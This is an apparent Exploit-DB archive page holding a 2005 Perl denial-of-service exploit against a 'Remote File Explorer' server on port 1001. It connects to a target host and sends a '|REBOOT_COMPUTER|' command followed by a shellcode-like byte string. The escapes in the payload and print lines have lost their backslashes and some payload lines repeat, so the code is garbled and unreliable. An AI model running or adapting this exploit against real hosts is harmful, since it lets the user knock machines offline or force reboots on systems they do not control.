https://www.exploit-db.com/exploits/1100

漏洞细节尚未披露

#!/usr/local/bin/perl
#
#    Remote File Explorer DoS Exploit
# ----------------------------------------
#
# Resolve host... [OK]
#  [+] Connecting... [OK]
# Target locked
# Sending bad procedure... [OK]
#  [+] Server DoS'ed
#
# Tested on Windows2000 SP4
# Info: infamous.2hell.com


$ARGC=@ARGV;
if ($ARGC !=1) {
    print "Usage: $0 <host>n";
    print "Example: $0 127.0.0.1n";
    exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1001"; # default port for the server

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$sploit = "|REBOOT_COMPUTER|".
"xebx6ex5ex29xc0x89x46x10".
"x40x89xc3x89x46x0cx40x89".
"x46x08x8dx4ex08xb0x66xcd".
"x40x89xc3x89x46x0cx40x89".
"x46x08x8dx4ex08xb0x66xcd".
"x80x43xc6x46x10x10x88x46".
"x08x31xc0x31xd2x89x46x18".
"xb0x90x66x89x46x16x8dx4e".
"x14x89x4ex0cx8dx4ex08xb0".
"x66xcdx80x89x5ex0cx43x43".
"xb0x66xcdx80x89x56x0cx89".
"x08x31xc0x31xd2x89x46x18".
"xb0x90x66x89x46x16x8dx4e".
"x14x89x4ex0cx8dx4ex08xb0".
"x56x10xb0x66x43xcdx80x86".
"xc3xb0x3fx29xc9xcdx80xb0".
"x14x89x4ex0cx8dx4ex08xb0".
"x66xcdx80x89x5ex0cx43x43".
"xb0x66xcdx80x89x56x0cx89".
"x56x10xb0x66x43xcdx80x86".
"xc3xb0x3fx29xc9xcdx80xb0".
"x3fx41xcdx80xb0x3fx41xcd".
"x80x88x56x07x89x76x0cx87".
"xf3x8dx4bx0cxb0x0bxcdx80".
"xe8x8dxffxff";


$msg = $sploit;
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;

# milw0rm.com [2005-07-11]